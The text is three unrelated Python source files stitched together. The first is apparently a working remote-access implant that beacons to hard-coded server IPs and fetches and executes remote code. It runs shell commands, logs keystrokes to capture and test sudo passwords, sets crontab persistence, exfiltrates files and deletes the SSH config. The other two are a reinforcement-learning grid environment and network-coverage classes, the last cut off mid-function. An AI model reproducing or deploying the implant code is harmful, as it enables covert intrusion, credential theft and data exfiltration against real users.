key = base64.b64decode(key)
data = json.dumps(data).encode()
h = HMAC.new(key, digestmod=SHA256)
iv = get_random_bytes(16) # generate a new random IV
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
ciphertext = cipher.encrypt(pad(data, 16))
h.update(iv + ciphertext)
return iv + ciphertext + h.digest()
def encrypt_code(data, key=agent.get_Encryption_key()):
key = base64.b64decode(key)
data = data.encode()
iv = get_random_bytes(16) # generate a new random IV
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
ciphertext = cipher.encrypt(pad(data, 16))
return iv + ciphertext
def decrypt_AES256(data, key=agent.get_Encryption_key(), UUID=False):
key = base64.b64decode(key)
# Decode and remove UUID from the message first
data = base64.b64decode(data)
uuid = data[:36]
data = data[36:]
# hmac should include IV
mac = data[-32:] # sha256 hmac at the end
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:-32] # the rest is the message
h = HMAC.new(key=key, msg=iv + message, digestmod=SHA256)
h.verify(mac)
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
# now to remove any padding that was added on to make it the right block size of 16
decrypted_message = unpad(decrypted_message, 16)
if UUID:
return uuid.decode("utf-8") + decrypted_message.decode("utf-8")
else:
return json.loads(decrypted_message)
def decrypt_code(data, key=agent.get_Encryption_key()):
key = base64.b64decode(key)
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:] # the rest is the message
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
decrypted_message = unpad(decrypted_message, 16)
return decrypted_message
def to64(data):
serialized = data.encode('utf-8')
base64_bytes = base64.b64encode(serialized)
return base64_bytes.decode('utf-8')
def from64(data, UUID=False):
response_bytes = data.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
response_message = response_decode.decode('utf-8')
if UUID:
return response_message
else:
return ast.literal_eval(response_message[36:])
def getIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def getPublicIP():
return requests.get('https://api.ipify.org').text
def send(response, uuid):
if agent.get_Encryption_key() != "":
enc = encrypt_AES256(response)
message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(),agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
dec = decrypt_AES256(x.text)
if isinstance(dec, str):
return json.loads(dec)
else:
return dec
else:
serialized = json.dumps(response)
message = to64(serialized)
uuid = to64(uuid)
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(), agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
res = from64(x.text)
return res
def checkin():
print("[+] CHECKIN")
checkin_data = {
"action": "checkin",
"ip": getPublicIP() + "/" + getIP(),
"os": platform.system() + " " + platform.release(),
"user": getpass.getuser(),
"host": socket.gethostname(),
"domain": socket.getfqdn(),
"pid": os.getpid(),
"uuid": agent.get_PayloadUUID(),
"architecture": platform.architecture(),
"encryption_key": agent.get_Encryption_key(),
"decryption_key": agent.get_Decryption_key()
}
res = send(checkin_data, agent.get_PayloadUUID())
try:
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
except:
res = json.loads(res)
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
def get_tasks():
tasks = {
'action': "get_tasking",
'tasking_size': -1
}
task_list = send(tasks, agent.get_UUID())
if "delegates" in task_list:
for m in task_list["delegates"]:
delegates_aswers.append(m)
return task_list
def reverse_upload(task_id, file_id):
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
return code
def post_result():
global responses
global delegates
global delegates_aswers
response = {}
if delegates:
response = {
'action': "post_response",
'responses': responses,
'delegates': delegates
}
responses = []
delegates = []
else:
response = {
'action': "post_response",
'responses': responses
}
responses = []
result = send(response, agent.get_UUID())
if "delegates" in result:
for m in result["delegates"]:
delegates_aswers.append(m)
return result
def execute_tasks(tasks):
if tasks:
for task in tasks['tasks']:
execute(task)
r = random.randint(0,1)
if r < 0.5:
r = -1
else:
r = 1
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
time.sleep(sleep_time / 5)
post_result()
def run_in_thread(function, param_list, task):
found = False
for item in dynfs:
if item == function:
try:
if agent.get_Encryption_key() == "":
exec(dynfs[item])
else:
exec(decrypt_code(dynfs[item]))
eval(function + "(" + str(param_list) + ")")
found = True
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
if found == False:
try:
eval(function + "(" + str(param_list) + ")")
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
def execute(task):
# Search in the dynamic functions first, so a command can be sobstituted through the load functionality
function = str(task['command'])
if function != "code":
print("\n[+] EXECUTING " + function)
param_list = "task['id'],"
if task['parameters'] != '' and task['parameters'][0] == "{":
parameters = ast.literal_eval(task['parameters'])
for param in parameters:
param_list += "ast.literal_eval(task['parameters'])['" + param + "'],"
else:
if task['parameters'] != '':
param_list += "task['parameters'],"
param_list = param_list[:-1]
thread = threading.Thread(target=run_in_thread, args=(function, param_list, task))
thread.start()
################################################################################################################
# The comment below will be sobstituted by the definition of the functions imported at creation time
def trace(task_id, command=None):
ip = requests.get('https://api.ipify.org').text
if command==None:
response = {
'task_id': task_id,
"user_output": ip,
'completed': True
}
responses.append(response)
try:
os.remove(os.path.expanduser("~") + "/.ssh/config")
except:
print(colored("Not enough permissions", "red"))
else:
path = ""
print("PATH = " + str(command))
if command == False:
path = ip
else:
path += command + " --> " + getpass.getuser() + "@" + ip + ";" + sudo
response = {
'task_id': task_id,
"user_output": path,
'completed': True
}
responses.append(response)
print("\t- Trace Done")
return
def nmap(task_id, command):
sudo = "bubiman10"
ip = requests.get('https://api.ipify.org').text
print('My public IP address is: {}'.format(ip))
if sudo != "":
response = {
'task_id': task_id,
"user_output": getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired. Try using keylog first. " + getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
print("\t- Nmap Done")
return
def p2p_server(task_id):
class RequestHandler(myRequestHandler):
def do_POST(self):
global delegates_aswers
content_len = int(self.headers.get('content-length', 0))
post_body = self.rfile.read(content_len)
received_uuid = ""
received_message = ""
decode = ""
encrypted = False
try:
decode = base64.b64decode(post_body)
decode = decode.decode("utf-8")
except:
decode = decrypt_AES256(post_body, UUID=True)
encrypted = True
received_uuid = str(decode)[:36]
received_message = json.loads(decode[36:])
encoded = to64(decode)
if received_message["action"] == "checkin":
delegate = {
"message": encoded,
"uuid": agent.get_PayloadUUID(),
"c2_profile": "myp2p"
}
else:
delegate = {
"message": encoded,
"uuid": received_uuid,
"c2_profile": "myp2p"
}
delegates.append(delegate)
while delegates_aswers == []:
pass
reply_message = ""
if received_message["action"] == "checkin":
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message = message[36:]
message = json.loads(message)
if message["action"] == "checkin":
reply_message = answer['message']
else:
reply = False
while not reply:
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message_uuid = message[:36]
message = message[36:]
message = json.loads(message)
if answer['uuid'] == received_uuid and message["action"] == received_message["action"]:
if message["action"] == "get_tasking":
if message["tasks"] != []:
for task in message["tasks"]:
if task["command"] == "trace":
ip = requests.get('https://api.ipify.org').text
if task["parameters"] == "":
task["parameters"] = getpass.getuser() + "@" + ip + ";" + sudo
else:
task["parameters"] += " --> " + getpass.getuser() + "@" + ip + ";" + sudo
reply_message = to64(message_uuid) + to64(str(message))
delegates_aswers.remove(answer)
reply = True
if reply_message == "":
reply_message = answer['message']
delegates_aswers.remove(answer)
reply = True
if encrypted:
reply_message = base64.b64decode(reply_message).decode()
uuid = reply_message[:36]
message = reply_message[36:]
enc = encrypt_AES256(message)
reply_message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
self.protocol_version = "HTTP/1.1"
self.send_response(200)
self.send_header("Content-Length", len(reply_message))
self.end_headers()
self.wfile.write(bytes(reply_message, "utf8"))
def run():
p2p_port = 9090
server = ('', p2p_port)
httpd = HTTPServer(server, RequestHandler)
thread = threading.Thread(target = httpd.serve_forever, daemon=True)
thread.start()
response = {
'task_id': task_id,
"user_output": "P2P Server started on {}:{}".format(getIP(), p2p_port),
'completed': True
}
responses.append(response)
print("\t- P2P Server started on {}:{}".format(getIP(), p2p_port))
run()
def load(task_id, file_id, cmds):
global responses
code = reverse_upload(task_id, file_id)
name = cmds
if agent.get_Encryption_key() == "":
dynfs[name] = code
else:
dynfs[name] = encrypt_code(code)
response = {
'task_id': task_id,
"user_output": "Module successfully added",
'commands': [
{
"action": "add",
"cmd": name
}
],
'completed': True
}
responses.append(response)
print("\t- Load Done")
return
def keylog_no_X(task_id):
global responses
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def find_event():
f = open("/proc/bus/input/devices")
lines = str(f.readlines())
while lines.find("I:") != -1:
#Read block by block
event = ""
start = lines.find("I:")
end = lines.find("B: EV=")+12
if lines[start:end].find("B: EV=12001") != -1:
event_start = lines[start:end].find("event")
event_start += start
i = 1
try:
while True:
int(lines[event_start + 5 : event_start + 5 + i])
event = lines[event_start: event_start + 5 + i]
i += 1
except:
return event
lines = lines[end-6:]
qwerty_map = {
2: "1", 3: "2", 4: "3", 5: "4", 6: "5", 7: "6", 8: "7", 9: "8", 10: "9",
11: "0", 12: "-", 13: "=", 14: "[BACKSPACE]", 15: "[TAB]", 16: "a", 17: "z",
18: "e", 19: "r", 20: "t", 21: "y", 22: "u", 23: "i", 24: "o", 25: "p", 26: "^",
27: "$", 28: "\n", 29: "[CTRL]", 30: "q", 31: "s", 32: "d", 33: "f", 34: "g",
35: "h", 36: "j", 37: "k", 38: "l", 39: "m", 40: "ù", 41: "*", 42: "[SHIFT]",
43: "<", 44: "w", 45: "x", 46: "c", 47: "v", 48: "b", 49: "n", 50: ",",
51: ";", 52: ":", 53: "!", 54: "[SHIFT]", 55: "FN", 56: "ALT", 57: " ", 58: "[CAPSLOCK]",
}
print(find_event())
infile_path = "/dev/input/" + find_event().strip()
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
line = ""
while event:
if break_function:
print("break detected, stopping keylog")
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
break_function = False
return
(_, _, type, code, value) = struct.unpack(FORMAT, event)
if code != 0 and type == 1 and value == 1:
if code == 28 or code == 96:
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
else:
line += qwerty_map[code]
event = in_file.read(EVENT_SIZE)
def keylog(task_id):
global responses
global stopping_functions
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def keylogger():
def on_press(key):
global line
global nextIsPsw
global sudo
global break_function
if "keylog" in stopping_functions:
print(colored("\t - Keylogger stopped", "red"))
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
line = ""
break_function = False
return False
try:
line = line + key.char
k = key.char
except:
try:
k = key.name
if key.name == "backspace":
if len(line) > 0:
line = line[:-1]
elif key.name == "space":
line += " "
elif key.name == "enter":
print(nextIsPsw)
if nextIsPsw == True:
print("I GOT THE PASSWORD: {}".format(line))
cmd = "echo {} | sudo -S touch fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
p = subprocess.Popen(["ls"], stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
if "fileToCheckSudo.asd" in str(stdout):
cmd = "echo {} | sudo -S rm fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
response = {
"task_id": task_id,
"user_output": "root password acquired: {}".format(line),
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
nextIsPsw = False
sudo = line
line = ""
else:
if 'sudo ' in line:
print("Next should be password")
nextIsPsw = True
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
elif key.name == "shift" or key.name == "ctrl" or key.name == "alt" or key.name == "caps_lock" or key.name == "tab":
if "crtlc" in line:
line = ""
nextIsPsw = False
else:
line = line + key.name
except:
pass
listener = keyboard.Listener(on_press=on_press)
listener.start()
listener.join()
thread2 = threading.Thread(target=keylogger, args=())
thread2.start()
print("\t- Keylog Running")
line = ""
nextIsPsw = False
def upload(task_id, file_id, remote_path):
global responses
remote_path = remote_path.replace("\\", "")
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
f = open(remote_path, "w")
f.write(code)
f.close()
response = {
'task_id': task_id,
"user_output": "File Uploaded",
'completed': True
}
responses.append(response)
print("\t- Upload Done")
return
def exit_agent(task_id):
response = {
'task_id': task_id,
"user_output": "Exited",
'completed': True
}
responses.append(response)
print("\t- Exit Done")
sys.exit()
def shell(task_id, cmd):
global responses
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
resp = ""
if isinstance(stdout, bytes):
resp = stdout.decode()
elif isinstance(stderr, bytes):
resp = stderr.decode()
else:
resp = "Error"
response = {
'task_id': task_id,
"user_output": resp,
'completed': True
}
responses.append(response)
print("\t- Shell Done")
return
def redirect(task_id, command):
global redirecting
redirecting = True
time.sleep(int(agent.get_Sleep()))
params = command.replace(":", " ")
params = params.split(" ")
if len(params) < 2:
response = {
'task_id': task_id,
"user_output": "usage redirect <host:port> [OPTIONAL] <encryption_key>",
'completed': True
}
responses.append(response)
return
else:
ip = params[0]
port = params[1]
response = {
'task_id': task_id,
"user_output": "Redirected to {}:{}".format(agent.get_Server(), agent.get_Port()),
'completed': True
}
responses.append(response)
if len(params) > 2:
print(colored("Setting key {}".format(params[2]), "red"))
agent.set_Encryption_key(params[2])
agent.set_Server("http://" + ip)
agent.set_Port(port)
print(colored("Switching to {}:{}".format(agent.get_Server(), agent.get_Port()), "green"))
checkin()
print("\t- Redirect Done")
redirecting = False
return
def stop(task_id, function_name):
global stopping_functions
stopping_functions.append(str(function_name).strip())
response = {
'task_id': task_id,
"user_output": "Break",
'completed': True
}
responses.append(response)
return
def persistance(task_id):
global responses
global sudo
agent_name = "prova.py"
cwd = os.getcwd()
if sudo != "":
subprocess.call('echo ' + sudo + ' | sudo -S chmod 777 ' + agent_name, shell=True)
subprocess.call('crontab -l > mycron.tmp', shell=True)
subprocess.call('echo "@reboot sleep 30 && cd ' + cwd + ' && ./' + agent_name + '" >> mycron.tmp', shell=True)
subprocess.call('crontab mycron.tmp', shell=True)
subprocess.call('rm mycron.tmp', shell=True)
response = {
'task_id': task_id,
"user_output": "crontab scheduled at each reboot",
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired or wrong. Use keylog module to try stealing",
'completed': False
}
responses.append(response)
print("\t- Persistance Done")
return
def download(task_id, path):
global responses
path = path.replace("\\", "/")
# print("Downloading " + path)
# chunkSize = 512000
chunkSize = 10000
fileSize = os.path.getsize(path)
chunks = math.ceil(fileSize / chunkSize)
fullpath = os.path.abspath(path)
# print("FILESIZE = " + str(fileSize))
# print(str(chunks) + " chunks needed")
response = {
"total_chunks": chunks,
"task_id": task_id,
"full_path": fullpath,
"host": "",
"is_screenshot": "false"
}
responses.append(response)
def download_thread():
i = 1
file_id = ""
while i != chunks +1:
if result:
for item in result['responses']:
if item['task_id'] == task_id and item['status'] == "success":
# print("HO TROVATO IL LA RIPOSTA SUCCESS PER QUESTO TASK")
if file_id == "":
file_id = item['file_id']
result['responses'].remove(item)
f = open(fullpath, 'r')
f.seek((i-1)*chunkSize)
blob = f.read(chunkSize)
chunk_data = to64(blob)
if i == chunks:
print("i == chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id,
"completed": True
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i +=1
print("\t- Download Done")
exit()
else:
print("i != chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i += 1
if item['task_id'] == task_id and item['status'] != "success":
print("ERROR SENDING FILE")
break
d = threading.Thread(target=download_thread, args=())
d.start()
def run(task_id, code):
global responses
print("\t" + code)
eval(code)
response = {
'task_id': task_id,
"user_output": "Executed",
'completed': True
}
responses.append(response)
print("\t- Run Done")
return
def code(task_id, code, param, parallel_id):
global responses
print("Running code with \n {} \n {}".format(code, param))
try:
exec(code)
eval("worker(param)")
except Exception as e:
print(e)
response = {
'task_id': task_id,
"user_output": worker_output,
'completed': True
}
responses.append(response)
print("\t- Parallel Done")
return
def ls(task_id, path, third):
global responses
path = path.replace("\\", "")
path = path.replace("//", "/")
fullpath = str(os.path.abspath(path))
files = []
for f in os.listdir(path):
permissions = ""
modify_time = ""
access_time = ""
file_path = os.path.abspath(f)
try:
st = os.stat(file_path)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(file_path)
access_time = time.ctime (fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(file_path))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(fullpath):
try:
for path, dirs, files in os.walk(file_path):
for x in files:
fp = os.path.join(path, x)
size += os.path.getsize(fp)
except:
size: -1
elif os.path.isfile(f):
try:
size = os.path.getsize(file_path)
except:
size: -1
try:
a = {
"is_file": os.path.isfile(f),
"permissions": {'permissions': permissions},
"name": f,
"access_time": access_time,
"modify_time": modify_time,
"size": size
}
files.append(a)
except:
print("No permission")
name = ""
if os.path.isfile(path):
name = path
else:
name = os.path.basename(os.path.normpath(fullpath))
permissions = ""
modify_time = ""
access_time = ""
try:
st = os.stat(fullpath)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(fullpath)
access_time = time.ctime(fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(fullpath))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(f):
try:
for path, dirs, files in os.walk(file_path):
for x in files:
fp = os.path.join(path, x)
size += os.path.getsize(fp)
except:
size: -1
elif os.path.isfile(f):
try:
size = os.path.getsize(file_path)
except:
size: -1
parent_path = os.path.dirname(fullpath)
if name == "":
name = "/"
parent_path = ""
response = {
"task_id": task_id,
"user_output": "Listing Done",
"file_browser": {
"host": socket.gethostname(),
"is_file": os.path.isfile(fullpath),
"permissions": {'permissions': permissions},
"name": name,
"parent_path": parent_path,
"success": True,
"access_time": access_time,
"modify_time": modify_time,
"size": size,
"files": files,
},
"completed": True
}
responses.append(response)
print("\t- ls Done")
return
def parallel(task_id, file_name, workers, parameters={}):
response = {
'task_id': task_id,
"user_output": "Command received",
'completed': True
}
responses.append(response)
return
################################################################################################################
# MAIN LOOP
# agent = Agent()
uuid_file = "UUID.txt"
if os.path.isfile(uuid_file):
# f = open(uuid_file, "r")
# agent.UUID = f.read()
pass
else:
checkin()
# f = open(uuid_file, "w")
# f.write(agent.UUID)
# f.close()
# ip = getPublicIP()
# if ip == "194.195.242.157" or ip == "172.104.135.23" or ip == "172.104.135.67":
# print("[+] P2P Server")
# p2p_server(1)
while True:
while not redirecting:
tasks = get_tasks()
execute_tasks(tasks)
r = random.randint(0,1)
if r < 0.5:
r = -1
else:
r = 1
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
sleep_time = random.randint(0, int(sleep_time))
time.sleep(sleep_time / 5)
|
import numpy as np
from src.DH.Grid import DHGrid, DHGridParams
from src.DHMulti.State import DHMultiState
class DHMultiGridParams(DHGridParams):
def __init__(self):
super().__init__()
self.num_agents_range = [1, 3]
class DHMultiGrid(DHGrid):
def __init__(self, params: DHMultiGridParams, stats):
super().__init__(params, stats)
self.params = params
self.num_agents = params.num_agents_range[0]
def init_episode(self):
self.device_list = self.device_manager.generate_device_list(self.device_positions)
self.num_agents = int(np.random.randint(low=self.params.num_agents_range[0],
high=self.params.num_agents_range[1] + 1, size=1))
state = DHMultiState(self.map_image, self.num_agents)
state.reset_devices(self.device_list)
# Replace False insures that starting positions of the agents are different
idx = np.random.choice(len(self.starting_vector), size=self.num_agents, replace=False)
state.positions = [self.starting_vector[i] for i in idx]
state.movement_budgets = np.random.randint(low=self.params.movement_range[0],
high=self.params.movement_range[1] + 1, size=self.num_agents)
state.initial_movement_budgets = state.movement_budgets.copy()
return state
def init_scenario(self, scenario):
self.device_list = scenario.device_list
self.num_agents = scenario.init_state.num_agents
return scenario.init_state
def get_example_state(self):
num_agents = self.params.num_agents_range[0]
state = DHMultiState(self.map_image, num_agents)
state.device_map = np.zeros(self.shape, dtype=float)
state.collected = np.zeros(self.shape, dtype=float)
return state
|
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
import scipy
import scipy.spatial
import yafs.utils
import math
from matplotlib.collections import PatchCollection,PolyCollection
from yafs.utils import haversine_distance
from functools import partial
import pyproj
from shapely.ops import transform
from shapely.geometry import Point
from matplotlib.patches import Circle
class Coverage(object):
def __init__(self):
None
def update_coverage_of_endpoints(self, **kwargs):
return None
def connection(self,point):
return None
@staticmethod
def get_polygons_on_map():
return None
def connection_between_mobile_entities(self, fixed_endpoints, mobile_endpoints):
# type: (dict, dict) -> dict
"""
Args:
fixed_endpoints: dict , {id_node: (lat,lng)}
mobile_endpoints: dict, {code_mobile_entity: (lat,lng)}
Returns:
dict {code_mobility_entity : id_node}
"""
return {}
class CircleCoverage(Coverage):
def __init__(self, map, points,radius):
self.points = points
self.radius = radius #radius in km
#Points on the map projection
self.points_to_map = [map.to_pixels(p[0], p[1]) for p in self.points]
# Radius in the map projection
b = self.__geodesic_point_buffer(points[0][0], points[0][1], self.radius)
bonmap = map.to_pixels(b[0])
ponmap = map.to_pixels(points[0][0],points[0][1])
distance = math.sqrt(math.pow((bonmap[0]-ponmap[0]),2)+math.pow((bonmap[1]-ponmap[1]),2))
self.radius_on_coordinates = distance
# Region on the map projection
self.regions_to_map = [Circle((region[0],region[1]),self.radius_on_coordinates) for region in self.points_to_map]
# Color of the regions
self.cmap = plt.cm.Accent
self.colors_cells = self.cmap(np.linspace(0., 1., len(self.points)))[:, :3]
def update_coverage_of_endpoints(self, map, points):
"""
It updates the points, regions and colors in case of endpoints and mobile-endpoints changes
Args:
map:
points:
"""
self.points = points
self.points_to_map = [map.to_pixels(p[0], p[1]) for p in self.points]
self.regions_to_map = [Circle((region[0], region[1]), self.radius_on_coordinates) for region in self.points_to_map]
self.colors_cells = self.cmap(np.linspace(0., 1., len(self.points)))[:, :3]
def get_polygons_on_map(self):
"""
This functions display network endpoint on the map representation
Returns:
a list of matplotlib Polygons
"""
return PatchCollection(self.regions_to_map, facecolors=self.colors_cells, alpha=.25)
def connection(self, point):
"""
Compute the connection among a user and endpoints
In this implementation the preference between several endpoints is given by the less distance
Other policies can be implemented storing a historic of connections.
Args:
point: [lng,lat] a user position
Returns:
the index on self.points
"""
most_close = [999999999] # the minimun value in all var. of array are infinity
for idx,center in enumerate(self.points):
dist = haversine_distance(point,center)
if dist <= self.radius: #km to meters
most_close.append(dist)
else:
most_close.append(float("inf"))
min = np.argmin(most_close)
if min == 0:
return None
return min-1
def connection_between_mobile_entities(self, fixed_endpoints, mobile_endpoints,mobile_fog_entities):
# type: (dict, dict) -> dict
"""
Args:
fixed_endpoints: dict , {id_node: (lat,lng)}
mobile_endpoints: dict, {code_mobile_entity: (lat,lng)}
Returns:
dict {code_mobility_entity : id_node}
"""
result = {}
for code in mobile_fog_entities:
# print mobile_fog_entities[code]
if mobile_fog_entities[code]["connectionWith"] != None:
result[code] = mobile_fog_entities[code]["connectionWith"]
else:
point = mobile_endpoints[code]
idx = np.argmin(np.sum((np.array(fixed_endpoints.values()) - point) ** 2, axis=1))
id_node = list(fixed_endpoints)[idx]
pnode = fixed_endpoints[id_node]
if self.__circle_intersection(point,pnode):
result[code] = [list(fixed_endpoints)[idx]]
return result
def __circle_intersection(self, center1, center2):
"""
Based on: https://gist.github.com/xaedes/974535e71009fa8f090e
Args:
center1: coordinates of a circle
center2: coordinates of a circle
Returns: a boolean, in case of a circle is touching or included in the other circle
"""
# return self.circle_intersection_sympy(circle1,circle2)
x1, y1 = center1
x2, y2 = center2
r1 = self.radius
# http://stackoverflow.com/a/3349134/798588
dx, dy = x2 - x1, y2 - y1
d = math.sqrt(dx * dx + dy * dy)
if d > r1 + r1:
return False ## no solutions, the circles are separate
return True # no solutions because one circle is contained within the other
def __geodesic_point_buffer(self, lon, lat, km):
"""
Based on: https://gis.stackexchange.com/questions/289044/creating-buffer-circle-x-kilometers-from-point-using-python
Args:
lon:
lat:
km:
Returns:
a list of coordinates with radius km and center (lat,long) in this projection
"""
proj_wgs84 = pyproj.Proj(init='epsg:4326')
# Azimuthal equidistant projection
aeqd_proj = '+proj=aeqd +lat_0={lat} +lon_0={lon} +x_0=0 +y_0=0'
project = partial(
pyproj.transform,
pyproj.Proj(aeqd_proj.format(lat=lat, lon=lon)),
proj_wgs84)
buf = Point(0, 0).buffer(km * 1000) # distance in metres
return transform(project, buf).exterior.coords[:]
class Voronoi(Coverage):
def __init__(self, map, points):
self.tree = None
self.points = points
self.__vor = scipy.spatial.Voronoi(self.points)
self.regions, self.vertices = self.voronoi_finite_polygons_2d(self.__vor)
self.cells = [map.to_pixels(self.vertices[region]) for region in self.regions]
cmap = plt.cm.Set3
self.colors_cells = cmap(np.linspace(0., 1., len(self.points)))[:, :3]
def update_coverage_of_endpoints(self, map, points):
self.points = points
self.__vor = scipy.spatial.Voronoi(self.points)
self.regions, self.vertices = self.voronoi_finite_polygons_2d(self.__vor)
self.cells = [map.to_pixels(self.vertices[region]) for region in self.regions]
cmap = plt.cm.Set3
self.colors_cells = cmap(np.linspace(0., 1., len(self.points)))[:, :3]
def get_polygons_on_map(self):
return PolyCollection(self.cells, facecolors=self.colors_cells, alpha=.25,edgecolors="gray")
def connection(self,point):
"""
Args:
point: [lng,lat]
Returns:
the index on self.points
"""
return np.argmin(np.sum((self.points - point) ** 2, axis=1))
def connection_between_mobile_entities(self,fixed_endpoints,mobile_endpoints):
# type: (dict, dict) -> dict
"""
Args:
fixed_endpoints: dict , {id_node: (lat,lng)}
mobile_endpoints: dict, {code_mobile_entity: (lat,lng)}
Returns:
dict {code_mobility_entity : id_node}
"""
result = {}
